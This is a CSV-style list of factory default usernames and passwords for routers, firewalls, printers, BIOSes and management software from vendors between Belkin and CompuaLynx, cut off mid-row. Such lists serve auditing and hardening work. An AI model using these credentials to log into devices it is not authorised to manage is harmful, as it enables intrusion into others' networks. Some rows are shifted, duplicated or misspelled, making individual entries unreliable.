4V1,1002,,insight_wifi_1902,lgibson5405,,,\nbelkin,F5D7630au4,,192.168.2.1,,,Admin,,\nbelkin,F5D7633-4,,192.168.2.1,,,Admin,,\nbelkin,F5D7633au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D7634au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D8230-4,,192.168.2.1,,,Admin,,\nbelkin,F5D8230-4,,http://192.168.2.1,,,Administration,,\nbelkin,F5D8231au4,,192.168.0.2,,,Admin,,\nbelkin,F5D8232-4,,192.168.2.1,,,Admin,,\nbelkin,F5D8236-4 V3,V3,192.168.0.1,,NONE,ADMIN,,\nbelkin,F5D8236au4,,192.168.2.1,admin,,Admin,,\nbelkin,F5D8632au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D8633au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D8635au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D8636au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D9230-4,,192.168.2.1,admin,admin,,,\nbelkin,F5D9230-4,,http://192.168.2.1,user:,,Administration,,\nbelkin,F5U025 USB Flash drive,,,,1111,,,\nbelkin,F6D4630au4A,,192.168.2.1,,(no default - user required to choose a password on setup),,,\nbelkin,F7D1301 v1,10011zb,192.168.2.1,belkin.3ebc,d4bba6ec,root,,\nbelkin,F7D2401au,,192.168.2.1,,,Admin,,\nbelkin,F8T030 Bluetooth AP,,,guest,guest,,Bluetooth passkey: belkin,\nbelkin,N300 Wireless N Router,all versions,192.168.2.1,belkin.f5c,,admin,,\nbelkin,P74476au,,http://10.0.0.2,admin,password,,,\nbelkin,PRO 3 KVM switch,,Console,admin,belkin,Admin,,\nbelkin,Wireless ADSL Modem/Router,,Full,admin,,,,\nbelkin,Wireless ADSL Modem/Router,,Multi,admin,,Full,,\nbelkin,f5d9230-4,,192.168.2.1,admin,admin,,,\nbenq,awl 700 wireless router,1.3.6 Beta-002,Multi,admin,admin,Admin,,\nbestpractical,RT,,,root,password,,,\nbestpractical,RT,,HTTP,root,password,Admin,,\nbestpracticalsolutions,Request Tracker,,,root,password,,,\nbetabrite,1026,,,,LLLLLL,Sign programming,Reset sign password,\nbetabrite,1036,,,,LLLLLL,Sign programming,Reset sign password,\nbetabrite,1040,,,,LLLLLL,Sign programming,Reset sign password,\nbetabrite,Prism 1196,,,,LLLLLL,Sign programming,Reset sign password,\nbetabrite,Prism full-colour LED sign,,,,,Sign programming,The sign has no password by default but if it does you can reset it by entering LLLLLL then a new password at the password prompt. Password is always 6 characters.,\nbewan,Wireless Routers,,,bewan,bewan,Admin,,\nbillion,5100W,,192.168.1.254,admin,admin,Admin,,\nbillion,5102S,,192.168.1.254,admin,admin,Admin,,\nbillion,5200,,192.168.1.254,admin,admin,Admin,,\nbillion,5200G,,192.168.1.254,admin,admin,Admin,,\nbillion,5200N,,192.168.1.254,admin,admin,Admin,,\nbillion,5200SRD,,192.168.1.254,admin,admin,Admin,,\nbillion,5210S,,192.168.1.254,admin,admin,Admin,,\nbillion,6200NXL,,192.168.1.254,admin,admin,Admin,,\nbillion,6404VGP,,192.168.1.254,admin,admin,Admin,,\nbillion,6404VP,,192.168.1.254,admin,admin,Admin,,\nbillion,6500,,192.168.1.254,admin,,Admin,,\nbillion,7000,,10.0.0.2,admin,epicrouter,Admin,,\nbillion,7100G,,192.168.1.254,admin,admin,Admin,,\nbillion,7100Pro,,192.168.1.254,admin,password,Admin,,\nbillion,7100S,,192.168.1.254,admin,admin,Admin,,\nbillion,711CE,,192.168.1.254,admin,password,Admin,,\nbillion,7202,,192.168.1.254,admin,admin,Admin,,\nbillion,7202G,,192.168.1.254,admin,admin,Admin,,\nbillion,7300,,192.168.1.254,admin,admin,Admin,,\nbillion,7300G,,192.168.1.254,admin,admin,Admin,,\nbillion,7300GRA,,192.168.1.254,admin,admin,Admin,,\nbillion,7300GX,,192.168.1.254,admin,admin,Admin,,\nbillion,7300N,,192.168.1.254,admin,admin,Admin,,\nbillion,7300RA,,192.168.1.254,admin,admin,Admin,,\nbillion,7301VGP,,192.168.1.254,admin,admin,Admin,,\nbillion,7400,,192.168.1.254,admin,admin,Admin,,\nbillion,7401VGP,,192.168.1.254,admin,admin,Admin,,\nbillion,7401VGP-M,,192.168.1.254,admin,admin,Admin,,\nbillion,7404VGPX,,192.168.1.254,admin,admin,Admin,,\nbillion,7404VNOX,,192.168.1.254,admin,admin,Admin,,\nbillion,7404VNPX,,192.168.1.254,admin,admin,Admin,,\nbillion,741GE,,192.168.1.254,admin,admin,Admin,,\nbillion,741GE,USB,192.168.1.254,admin,admin,Admin,,\nbillion,743GE,,192.168.1.254,admin,admin,Admin,,\nbillion,7500G,,192.168.1.254,admin,admin,Admin,,\nbillion,7700N,,192.168.1.254,admin,admin,Admin,,\nbillion,7700NR2,,192.168.1.254,admin,admin,Admin,,\nbillion,7800GZ,,192.168.1.254,admin,admin,Admin,,\nbillion,7800N,,192.168.1.254,admin,admin,Admin,,\nbillion,BiGuard 30,,192.168.1.254,admin,admin,Admin,,\nbillion,BiGuard 50G,,,admin,admin,Admin,,\nbillion,BiGuard S20,,192.168.1.254,admin,admin,Admin,,\nbillion,BiGuard S6000,,192.168.1.254,admin,admin,Admin,,\nbillion,BiGuard,,,admin,admin,,,\nbillion,BiPAC 5100,,192.168.1.254,admin,admin,Admin,,\nbillion,BiPAC 5100,,HTTP,admin,admin,Admin,,\nbillion,BiPAC 5102,,http://192.168.1.254,admin,admin,Administration,,\nbillion,BiPAC 640 AC,640AE100,HTTP,,,Admin,,\nbillion,BiPAC 6600,,http://192.168.1.254,,,Administration,,\nbillion,BiPAC 7202G,,http://192.168.1.254,admin,admin,Administration,,\nbillion,BiPAC 7402VGP,,http://192.168.1.254,admin,admin,Administration,,\nbillion,MyGuard 7500GL,,192.168.1.254,admin,admin,Admin,,\nbintec,Bianca/Brick,,XM-5.1,,snmp-Trap,,,\nbintec,Bianca/Brick,,read/write,,snmp-Trap,,,\nbintec,Bianca/Brick,XM-5.1,SNMP,,snmp-Trap,read/write,,\nbintec,Bianka \t,,admin bintec,Admin,No,,,\nbintec,Bianka Routers,,,admin,bintec,,,\nbintec,Bianka Routers,,Admin,admin,bintec,,,\nbintec,Bianka Routers,,Multi,admin,bintec,Admin,,\nbintec,all Routers,,,admin,bintec,,Any,\nbintec,x1200,37834,Multi,admin,bintec,Admin,,\nbintec,x2300i,37834,Multi,admin,bintec,Admin,,\nbintec,x3200,37834,Multi,admin,bintec,Admin,,\nbiodata,BIGfire,,,,Babylon,,,\nbiodata,Babylon,,,,Babylon,,,\nbiodata,Bigfire +,,Admin,config,biodata,,,\nbiodata,Bigfire +,,Multi,config,biodata,Admin,,\nbiostar,PC BIOS,,,,Biostar,,,\nbiostar,PC BIOS,,Admin,,Biostar,,,\nbiostar,PC BIOS,,Admin,,Q54arwms,,,\nbiostar,PC BIOS,,Console,,Biostar,Admin,,\nbiostar,PC BIOS,,Console,,Q54arwms,Admin,,\nbiscom,Biscom Delivery Server (BDS),,,admin,admin,,,\nbizdesign,ImageFoliio,,2.2,Admin,ImageFolio,,,\nbizdesign,ImageFolio Pro,,2.2,Admin,ImageFolio,,,\nbizdesign,ImageFolio Pro,2.2,HTTP,Admin,ImageFolio,Admin,default admin page is:/cgi-bidmidmin.cgi,\nbizdesign,ImageFolio,2.2,HTTP,Admin,ImageFolio,Admin,,\nblackberry,Pearl,,,,,Password Keeper,By default has no password,\nblackberry,Pearl,,,Password Keeper,By default has no password,\nblackbox,BLACK BOX ServSensor JR,,,Administrator,public,,,\nblackbox,BLACK BOX ServSensor JR,v2.0,HTTP,Administrator,public,,,\nblackwidowwebdesignltd,Saxon,5.4,http,admin,nimda,Admin,,\nblitzztechnologies,BWA711,,,admin,admin,,,\nbluecoatsystems,ProxySG,3.x,HTTP,admin,articon,Admin,access to command line interface via ssh and web gui,\nbmc software,Patrol,,Admin,Administrator,the same all over,,,\nbmc software,Patrol,,all,Administrator,the same all over,,,\nbmc,Patrol,,6,patrol,patrol,,,\nbmc,Patrol,,User,patrol,patrol,,,\nbmc,Patrol,6,Multi,patrol,patrol,User,,\nbmc,Patrol,6.0,Multi,patrol,patrol,User,,\nbmc,Patrol,all,BMC unique,Administrator,the same all over,Admin,this default user normally for ALL system in this area with one Password,\nbmc,Software Performance Assurance for Microsoft Servers,,,Best1_User,BackupU$r,,,\nborland,Interbase,,,,,,,\nborland,Interbase,,,,,,Any,\nborland,Interbase,,,SYSDBA,masterkey,,any,\nborland,Interbase,,,politcally,correct,,Any,\nborland,Interbase,,,politically,correct,,,\nborri,CS131,all versions,http,admin,UpsMon,,,\nboson,router simulator,,Admin,,,,,\nboson,router simulator,3.66,Multi,,,Admin,,\nbreezecom,Breezecom Adapters,,2.x,,laflaf,,,\nbreezecom,Breezecom Adapters,,3.x,,Master,,,\nbreezecom,Breezecom Adapters,,4.4.x,,Helpdesk,,,\nbreezecom,Breezecom Adapters,,4.x,,Super,,,\nbreezecom,Breezecom Adapters,,Admin,,Master,,,\nbreezecom,Breezecom Adapters,,Admin,,Super,,,\nbreezecom,Breezecom Adapters,,Admin,,laflaf,,,\nbreezecom,Breezecom Adapters,2.x,,,laflaf,,,\nbreezecom,Breezecom Adapters,2.x,,,laflaf,Admin,,\nbreezecom,Breezecom Adapters,3.x,,,Master,,,\nbreezecom,Breezecom Adapters,3.x,,,Master,Admin,,\nbreezecom,Breezecom Adapters,4.4.x,Console,,Helpdesk,Admin,,\nbreezecom,Breezecom Adapters,4.x,,,Super,,,\nbreezecom,Breezecom Adapters,4.x,,,Super,Admin,,\nbreezecom,SA10,,,,,,,\nbroadlogic,XLT router,,HTTP,webadmin,webadmin,Admin,,\nbroadlogic,XLT router,,Telnet,admin,admin,Admin,,\nbroadlogic,XLT router,,Telnet,installer,installer,Admin,,\nbroadmax,LinkMax HSA300A-2,,http://192.168.0.1,broadmax,broadmax,Admin,You need to put the IP as Gateway in TCPIP settings and 192.168.0.2 as your assigned IP.,\nbrocade,Fabric OS,,3.x,admin,password,,,\nbrocade,Fabric OS,,3.x,root,fivranne,,,\nbrocade,Fabric OS,,All,root,fivranne,,,\nbrocade,Fabric OS,,Multi,admin,password,Admin,Gigabit SAN,\nbrocade,Fabric OS,All,Multi,root,fibranne,Admin,,\nbrocade,Fabric OS,All,Multi,root,fivranne,Admin,Gigiabit SAN (),\nbrocade,Silkworm,all,Multi,admin,password,Admin,Also on other Fiberchannel switches,\nbrother,HL-1270n,,,,access,,,\nbrother,HL-1270n,,Multi,,access,network board access,,\nbrother,HL-1270n,,network board access,,access,,,\nbrother,HL-3040CN,,,admin,access,,,\nbrother,HL-5370DW,Firmware 1.18 Network Firmware 1.03,Web interface,admin,access,allows network configuration,,\nbrother,MFC Network-capable printers,all versions,http,admin,access,,,\nbrother,MFC-8860DB,,,admin,access,,,\nbrother,NC-3100h,,,,access,,,\nbrother,NC-3100h,,,,access,network board access,,\nbrother,NC-3100h,,network board access,,access,,,\nbrother,NC-4100h,,,,access,,,\nbrother,NC-4100h,,,,access,network board access,,\nbrother,NC-4100h,,network board access,,access,,,\nbrother,QL-580N,,,admin,access,,,\nbrother,ql580N,,,admin,access,,,\nbt,HomeHub,,192.168.1.254,admin,admin,Admin,,\nbt,Voyager 2000,,,admin,admin,,,\nbt,Voyager 2000,,,admin,admin,Admin,,\nbt,Voyager 240,,,admin,admin,Admin,,\nbuffalo,AirStation WLA-L11,,,root,,,Root acct cannot be changed, no password by default,\nbuffalo,AirStation WLA-L11,,,root,,,Root acct cannot be changed,no password by default\nbuffalo,BBR-4MG and BBR-4HG,ALL,HTTP,root,,Admin,,\nbuffalo,WBMR-G300N,,192.158.11.1 or 192.168.1.251,root,,Admin,,\nbuffalo,WHR-HP-G54,,192.158.11.1 or 192.168.11.100,root,,Admin,,\nbuffalo,WHR3-G54 Router,,,root,,,,\nbuffalo,WZR-HP-G300NH,,192.158.11.1 or 192.168.1.100,root,,Admin,,\nbuffalo,Wireless Broadband Base Station-g ,WLA-G54 WBR-G54,HTTP,root,,Admin,http://192.168.11.1,\nbuffalo,Wireless Broadband Base Station-g,,WLA-G54 WBR-G54,root,,,,\nbuffalo,Wireless Broadband Base Station-g,WLA-G54 WBR-G54,HTTP,root,,Admin,http://192.168.11.1,\nbuffalo/melco,AirStation,,,root,,,,\ncableandwireless,ADSL Modem/Router,,Multi,admin,1234,Admin,,\ncabletron,Netgear modem/router and SSR,,,netman,,,,\ncabletron,Netgear modem/router and SSR,,,netman,,Admin,,\ncabletron,Netgear modem/router and SSR,,Admin,netman,,,,\ncabletron,routers switches,,,,,,,\ncabletron,routers & switches,,,,,,,\ncabletron,routers &,,,,,,,\ncalldirect,CDM 882seu,All,192.168.1.50,admin,password,Admin,,\ncalldirect,CDR-780seu,All,192.168.1.50,admin,password,Admin,,\ncanon,2525i,,,7654321,7654321,,,\ncanon,2535i,,,7654321,7654321,,,\ncanon,IR 1025,,IP,,,Administrator,Administrator access does not need a password,\ncanon,MB5360,all versions,http,ADMIN,canon,Admin,,\ncanon,iFP650,all versions,http,,,admin,,\ncanon,iR-ADV C2020L,,https,7654321,7654321,Device Info,Supply Levels,Jobs Print Status\ncanon,iR-ADV C5035,,http,7654321,7654321,Admin,,\ncanon,iR1023,,Administrator,,0000,,,\ncanyon,router,,Multi,Administrator,admin,Admin,,\ncapricorninfotechindia,eToken Pro,,,,1234567890,,,\ncarestream,Health Spectrum,,,KeyOperator,DV5800,,,\ncarestream,Health Spectrum,,,LocalService,DV5800,,,\ncarstenschmitz,LimeSurvey,,,admin,password,,,\ncastlenet,,,http,MSO,changeme,ROOT,,\ncayman,3200,,,admin,admin,2015-06-21,,\ncayman,3220-H DSL Router,,,Any,,,GatorSurf 5.,\ncayman,Cayman DSL,,,,,,,\ncayman,Cayman DSL,,,,,Admin,,\ncayman,Cayman DSL,,3220-H,},,,,\ncayman,Cayman DSL,,Admin,,,,,\ncayman,Cayman DSL,,Admin,},,,,\ncayman,Cayman DSL,3220-H,,},,Admin,,\ncayman,Cayman DSL,SBC/Pacbell,,admin,(device serial number),Admin,,\ncayman,DSL Router,,,admin,(serial number),,,\ncelerity,Mediator,,,root,Mau,,,\ncelerity,Mediator,,Admin,root,Mau dib,,,\ncelerity,Mediator,,Multi,mediator,mediator,,,\ncelerity,Mediator,,Multi,root,Mau'dib,Admin,Assumption: the password is Mua'dib,\ncelerity,Mediator,,User,mediator,mediator,,,\ncelerity,Mediator,Multi,Multi,mediator,mediator,User,,\ncellit,CCPro,,,cellit,cellit,,,\ncellit,CCPro,,Multi,cellit,cellit,Admin,,\nceragonnetworks,FibeAir,,,root,tooridu,,,\ncgi world,Poll It,,v2.0,,protection,,,\ncgiworld,Poll It,2,HTTP,,protection,User/Admin over package,http://server.com/ScriptName.cgi?load=login,\ncgiworld,Poll It,2.0,HTTP,,protection,User/Admin over package,http://server.com/ScriptName.cgi?load=login,\nchase research,Iolan,,,,iolan,,,\nchaseresearch,Iolan,,,,iolan,,,\ncheckpoint,,,,admin,qaz123,,,\ncheckpoint,Firewall-1,,Multi,admin,abc123,admin,,\ncheckpoint,Firewall-1,,admin,admin,abc123,,,\ncheckpoint,Interspect 210,,SSH/Con/Serial,admin,admin,Admin,,\ncheckpoint,Interspect 210N,,SSH/Con/Serial,admin,admin,Admin,,\ncheckpoint,Interspect 410,,SSH/Con/Serial,admin,admin,Admin,,\ncheckpoint,Interspect 610,,SSH/Con/Serial,admin,admin,Admin,,\ncheckpoint,Interspect 610S,,SSH/Con/Serial,admin,admin,Admin,,\ncheckpoint,SecurePlatform,,Admin,admin,admin,,,\ncheckpoint,SecurePlatform,,NG FP3,admin,admin,,,\ncheckpoint,SecurePlatform,NG FP3,Console,admin,admin,Admin,,\nchuming chen,NessusWeb,,,administrator,adminpass,,,\nchumingchen,NessusWeb,,HTTP,administrator,adminpass,Admin,,\nciphertrust,IronMail,Any,Multi,admin,password,Admin,,\ncisco,1100,,,,Cisco,Admin,,\ncisco,1200,,,Cisco,Cisco,Admin,,\ncisco,1300,,,Cisco,Cisco,Admin,,\ncisco,1400,,,,Cisco,Admin,,\ncisco,1801,,10.10.10.1,cisco,cisco,Admin,Fixed Configuration,\ncisco,1841,,10.10.10.1,cisco,cisco,Admin,Modular Configuration,\ncisco,2100 aka DPX2100,all versions (comcast-supplied),http://192.168.100.1,,W2402,,password case sensitive,\ncisco,2600,,Telnet,Administrator,admin,Admin,,\ncisco,2811,,,cisco,cisco,Admin,,\ncisco,857,,10.10.10.1,cisco,cisco,Admin,,\ncisco,857W,,192.168.1.1,,cisco,Admin,,\ncisco,877,,10.10.10.1,cisco,cisco,,,\ncisco,877W,,10.10.10.1,cisco,cisco,Admin,,\ncisco,887,,,cisco,cisco,Admin,,\ncisco,AIR-AP1231G-A-K9,,,Cisco,Cisco,,,\ncisco,AIR-AP1231G-A-K9,,,Cisco,Cisco,Admin,Default SSID is tsunami. Username/password are case sensitive.,\ncisco,AP1200,IOS,Multi,Cisco,Cisco,Admin,This is when you convert AP1200 or AP350 to IOS,\ncisco,ASA 5505,,,Cisco,Cisco,Admin,,\ncisco,ATA 186,,,admin,,Admin,,\ncisco,Aironet 1100,,webadmin,Cisco,Cisco,,,\ncisco,Aironet 1100,AP1120B-E-K9,HTTP,Cisco,Cisco,webadmin,,\ncisco,Aironet 1130AG,,,Cisco,Cisco,Admin,,\ncisco,Aironet 1200,,,Cisco,Cisco,,,\ncisco,Aironet 1200,,10.10.10.1,Cisco,Cisco,Admin,,\ncisco,Aironet 1200,,HTTP,root,Cisco,Admin,,\ncisco,Aironet 1200,,Multi,Cisco,Cisco,,,\ncisco,Aironet 1230AG,,,Cisco,Cisco,Admin,,\ncisco,Aironet 1350,,HTTP,admin,tsunami,webadmin,,\ncisco,Aironet 1350,,webadmin,admin,tsunami,,,\ncisco,Aironet,,Multi,,_Cisco,Admin,,\ncisco,Aironet,,Multi,Cisco,Cisco,Admin,,\ncisco,Any Router and Switch,,,cisco,cisco,,10 thru 12,\ncisco,Arrowpoint,,,admin,system,Admin,,\ncisco,BBSD MSDE Client,,5.0 and 5.1,bbsd-client,NULL,,,\ncisco,BBSD MSDE Client,,database,bbsd-client,NULL,,,\ncisco,BBSD MSDE Client,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,NULL,database,The BBSD Windows Client password will match the BBSD MSDE Client password,\ncisco,BBSM Administrator,,5.0 and 5.1,Administrator,changeme,,,\ncisco,BBSM Administrator,,Admin,Administrator,changeme,,,\ncisco,BBSM Administrator,5.0 and 5.1,Multi,Administrator,changeme,Admin,,\ncisco,BBSM MSDE Administrator,,5.0 and 5.1,sa,,,,\ncisco,BBSM MSDE Administrator,,Admin,sa,,,,\ncisco,BBSM MSDE Administrator,5.0 and 5.1,IP and Named Pipes,sa,,Admin,,\ncisco,BBSM,,5.0 and 5.1,bbsd-client,changeme2,,,\ncisco,BBSM,,database,bbsd-client,changeme2,,,\ncisco,BBSM,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,changeme2,database,The BBSD Windows Client password will match the BBSD MSDE Client password,\ncisco,CNR,,Admin,admin,changeme,,,\ncisco,CNR,,All,admin,changeme,,,\ncisco,CNR,All,CNR GUI,admin,changeme,Admin,This is the default password for Cisco Network Registrar,\ncisco,Cache Engine,,,admin,diamond,,,\ncisco,Cache Engine,,Admin,admin,diamond,,,\ncisco,Cache Engine,,Console,admin,diamond,Admin,,\ncisco,Catalyst 4000/5000/6000,,All,,public/private/secret,,,\ncisco,Catalyst 4000/5000/6000,,RO/RW/RW+change SNMP config,,public/private/secret,,,\ncisco,Catalyst 4000/5000/6000,All,SNMP,,public/private/secret,RO/RW/RW+change SNMP config,default on All Cat switches running the native CatOS CLI software.,\ncisco,Catalyst Express 520,,,cisco,cisco,,,\ncisco,Cisco Broadband Troubleshooter,,,admin,changeme,,,\ncisco,Cisco Guard,,SNMP,,riverhead,,,\ncisco,Cisco IDS,,,root,attack,,,\ncisco,Cisco Works,,,admin,admin,,,\ncisco,CiscoWorks 2000,,,admin,cisco,,,\ncisco,CiscoWorks 2000,,,admin,cisco,Admin,,\ncisco,CiscoWorks 2000,,,guest,,,,\ncisco,CiscoWorks 2000,,,guest,,User,,\ncisco,CiscoWorks 2000,,Admin,admin,cisco,,,\ncisco,CiscoWorks 2000,,User,guest,,,,\ncisco,CiscoWorks,,Multi,admin,admin,,,\ncisco,Ciso Aironet 1100 series,Rev. 01,HTTP,,Cisco,Admin,,\ncisco,Codec,,,admin,,,,\ncisco,ConfigMaker Software,,,,cmaker,,any?,\ncisco,ConfigMaker,,,cmaker,cmaker,,,\ncisco,ConfigMaker,,,cmaker,cmaker,Admin,,\ncisco,ConfigMaker,,Admin,cmaker,cmaker,,,\ncisco,Content Engine,,Telnet,admin,default,Admin,,\ncisco,DPC3825,3.02,http://192.168.0.1,admin,W2402,Admin,,\ncisco,DPQ3212C,,192.168.100.1,,,Admin,,\ncisco,DPQ3925,,192.168.0.1,admin,password,Admin,,\ncisco,E3000,,192.168.1.1,admin,admin,admin,,\ncisco,EPC2425,1.0,http://192.168.0.1,,233897301,Admin,,\ncisco,EPC3925,,192.168.100.1 or 192.168.100.1,admin,password,Admin,,\ncisco,GSR,,Telnet,admin,admin,admin,,\ncisco,HSE,,Multi,hsa,hsadb,Admin,,\ncisco,HSE,,Multi,root,blender,Admin,,\ncisco,IDS (netranger),,,root,attack,,,\ncisco,IOS,,,,Cisco router,,,\ncisco,IOS,,,,c,,,\ncisco,IOS,,,,cc,,,\ncisco,IOS,,,,cisco,,,\ncisco,IOS,,,cisco,cisco,,,\ncisco,IOS,,,enable,cisco,,,\ncisco,IOS,,,private ReadWrite access,secret,,,\ncisco,IOS,,,public ReadOnly access,secret,,,\ncisco,IOS,,,ripeop,(no pw),,,\ncisco,IOS,,11.x-12.x,,ILMI,,,\ncisco,IOS,,12.1(3),,cable-docsis,,,\ncisco,IOS,,2600 series,,c,,,\ncisco,IOS,,Admin,,c,,,\ncisco,IOS,,Multi,,Cisco router,,,\ncisco,IOS,,Multi,,c,Admin,,\ncisco,IOS,,Multi,,cc,,,\ncisco,IOS,,Multi,,cisco,,,\ncisco,IOS,,Multi,cisco,cisco,,,\ncisco,IOS,,Multi,enable,cisco,,,\ncisco,IOS,,Multi,ripeop,,,,\ncisco,IOS,,SNMP read-write,,cable-docsis,,,\ncisco,IOS,,SNMP,private ReadWrite access,secret,Read/write,,\ncisco,IOS,,SNMP,public ReadOnly access,secret,Read,,\ncisco,IOS,,limited READ/WRITE,,ILMI,,,\ncisco,IOS,11.x-12.x,SNMP,,ILMI,limited READ/WRITE,,\ncisco,IOS,12.1(3),SNMP,,cable-docsis,SNMP read-write,,\ncisco,IOS,2600 Series,Multi,,c,Admin,,\ncisco,IP Conference Station,7936,HTTP,End User,7936,,,\ncisco,MGX,,,superuser,superuser,,*,\ncisco,Modeling Labs,,,uwmadmin,password,,,\ncisco,NA,,,prixadmin,prixadmin,,NA,\ncisco,N\\A,,,prixadmin,prixadmin,,N\\A,\ncisco,Net Ranger 2.2.1,,,root,attack,,Sol 5.6,\ncisco,Netranger/secure IDS,,,netrangr,attack,,,\ncisco,Netranger/secure IDS,,3.0(5)S17,root,attack,,,\ncisco,Netranger/secure IDS,,Admin,root,attack,,,\ncisco,Netranger/secure IDS,,Multi,netrangr,attack,,,\ncisco,Netranger/secure IDS,3.0(5)S17,Multi,root,attack,Admin,must be changed at the first connection,\ncisco,Network Registrar (CNR),,,admin,changeme,,,\ncisco,PIX 501,,192.168.1.1,cisco,cisco,Admin,,\ncisco,PIX firewall,,Telnet,,cisco,UID=pix,,\ncisco,PIX,,,,cisco,,,\ncisco,RV016,,http://192.168.1.1,admin,admin,Admin,,\ncisco,RV082,,http://192.168.1.1,admin,admin,Admin,,\ncisco,RVS4000,,http://192.168.1.1,admin,admin,Admin,,\ncisco,SG500 Series,,,cisco,cisco,Admin,,\ncisco,SPA-502G,,,,,Admin,,\ncisco,SPA-504G,,,,,Admin,,\ncisco,SPA-508G,,,,,Admin,,\ncisco,SPA-509G,,,,,Admin,,\ncisco,SRP521W-K9,,192.168.15.1,admin,telstra,Admin,,\ncisco,SRP527W-K9,,192.168.15.1,admin,cisco,Admin,,\ncisco,Traffic Anomaly Detector,,SNMP,,riverhead,,,\ncisco,Trailhead,,4.0,admin,admin,,,\ncisco,Trailhead,4,HTTP,admin,admin,Admin,,\ncisco,Trailhead,4.0,HTTP,admin,admin,Admin,,\ncisco,Unity,,,EAdmin,,,,\ncisco,Unity,,,EAdminlt;systemidgt;,,,,\ncisco,Unity,,,ESubscriber,,,,\ncisco,Unity,,,UAMIS_,,,,\ncisco,Unity,,,UAMIS_lt;servernamegt;,,,,\ncisco,Unity,,,UNITY_,,,,\ncisco,Unity,,,UNITY_lt;servernamegt;,,,,\ncisco,Unity,,,UOMNI_,,,,\ncisco,Unity,,,UOMNI_lt;servernamegt;,,,,\ncisco,Unity,,,UVPIM_,,,,\ncisco,Unity,,,UVPIM_lt;servernamegt;,,,,\ncisco,Unity,,1.3.2,bubba,,,,\ncisco,Unity,1.3.2,local,bubba,(unk),,Part numbers imprinted on the installation disks with a local user account bubba default RAID Manager address and DHCP server address:80-7111-01 for the UNITY-SVRX255-1A80-7112-01 for the UNITY-SVRX255-2A,\ncisco,Unity,1.3.2,local,bubba,(unk),,Part numbers imprinted on the installation disks with a local user account bubba,\ncisco,VPN 3000 Concentrator,,,admin,admin,,,\ncisco,VPN Concentrator 3000 series,3,Multi,admin,admin,Admin,,\ncisco,VPN3000,,,,changeit,,,\ncisco,Video Surveillance Manager (VSM),,,root,secur4u,,,\ncisco,WLSE,,Multi,root,blender,Admin,,\ncisco,WLSE,,Multi,wlse,wlsedb,Admin,,\ncisco,WRV54G,,192.168.1.1,admin,admin,Admin,,\ncisco,WRVS4400N,,192.168.1.1,admin,admin,Admin,,\ncisco,any,,,no default login,no default password,,any IOS,\ncisco,cva 122,,,admin,admin,,,\ncisco,cva 122,,Admin,admin,admin,,,\ncisco,cva 122,,Telnet,admin,admin,Admin,,\ncisco-arrowpoint,Arrowpoint,,,admin,system,,,\ncisco-arrowpoint,Arrowpoint,,Admin,admin,system,,,\ncitrix,Access Gateway,,,nsroot,nsroot,,,\nclaris,At-Ease,,,,familymacintosh,,,\nclearonecommunications,Converge Pro,,,clearone,converge,,,\nclearonecommunications,Converge,,,ClearOne,RAV,,,\ncnet,804-nf,,Admin,Admin,epicrouter,,,\ncnet,804-nf,,HTTP,Admin,epicrouter,Admin,,\ncnet,804-nf,,HTTP,admin,password,http://,,\ncnet,804-nf,,HTTP,admin,password,http://lt;ip-adressgt;,,\ncnet,804-nf,,http:// ,admin,password,,,\ncnet,CNET 4PORT ADSL MODEM,CNAD NF400,Multi,admin,epicrouter,Admin,,\ncobalt,RaQ * Qube*,,,admin,admin,,Any,\ncobalt,RaQ Qube,,,admin,admin,,,\ncobalt,Unknown,,,admin,admin,,,\ncolubris,MSC,5100,user,admin,admin,admin,continue with https,\ncolubrisnetworks,MSC 5100,,,admin,admin,,,\ncolubrisnetworks,MSC 5100,5100,http - https,admin,admin,Admin,make exception for invalid certificate to continue with https,\ncolubrisnetworks,MSC 5100,5100,http -> https,admin,admin,Admin,make exception for invalid certificate to continue with https,\ncomcast,Xfinity Wireless Gateway,,,admin,password,,,\ncomersus,Comersus Shopping Cart,3.2,,,admin,dmr99,,\ncomersus,Shopping Cart,,,admin,dmr99,,,\ncomodo,MyDLP,,,mydlp,mydlp,,,\ncompaq,Familiar Linux,,,root,rootme,,,\ncompaq,Familiar Linux,,telnet/ssh/con,root,rootme,Admin,,\ncompaq,Insight Manager,,,PFCUser,240653C9467E45,,,\ncompaq,Insight Manager,,,PFCUser,240653C9467E45,User,,\ncompaq,Insight Manager,,,administrator,administrator,,,\ncompaq,Insight Manager,,,administrator,administrator,Admin,,\ncompaq,Insight Manager,,,anonymous,,,,\ncompaq,Insight Manager,,,anonymous,,User,,\ncompaq,Insight Manager,,,operator,operator,,,\ncompaq,Insight Manager,,,user,public,,,\ncompaq,Insight Manager,,,user,public,User,,\ncompaq,Insight Manager,,,user,user,,,\ncompaq,Insight Manager,,,user,user,User,,\ncompaq,Insight Manager,,Admin,administrator,administrator,,,\ncompaq,Insight Manager,,User,PFCUser,240653C9467E45,,,\ncompaq,Insight Manager,,User,anonymous,,,,\ncompaq,Insight Manager,,User,user,public,,,\ncompaq,Insight Manager,,User,user,user,,,\ncompaq,Management Agents,,,administrator,,,All,\ncompaq,Networth FastPipes,,,root,manager,,,\ncompaq,Networth FastPipes,,Console,root,manager,,,\ncompaq,PC BIOS,,,,Compaq,,,\ncompaq,PC BIOS,,Admin,,Compaq,,,\ncompaq,PC BIOS,,Console,,Compaq,Admin,,\ncompaq,T1010,,@ , ,use ALT+G at boot to reset config,,,\ncompaq,T1010,,Multi,,use ALT+G at boot to reset config,@,,\ncompaq,T1010,,Multi,lt;no defaultgt;,use ALT+G at boot to reset config,@lt;ALTgt;lt;Ggt;,,\ncompaq,WBEM,,,administrator,administrator,,,\ncompaq,WBEM,,HTTP 2301 / HTTPS 2381,administrator,administrator,Admin,,\ncompex,MMC543AHV,,http://192.168.168.1,admin,Password,Admin,,\ncompex,NetPassage 15,,192.168.0.1,admin,password,Admin,,\ncompex,NetPassage 15B,,192.168.168.1,,password,Admin,,\ncompex,NetPassage 15BR,,http://192.168.168.1,,password,Administration,,\ncompex,NetPassage 18,,http://192.168.168.1,,password,Administration,,\ncompualynx,Cmail Server,,All Versions,administrator,asecret,,,\ncompualynx,Cmail Server,all,multi,administrator,asecret,Admin,,\ncompualynx,Cproxy Server,,All Versions,administrator,asecret,,,\ncompualynx,Cproxy 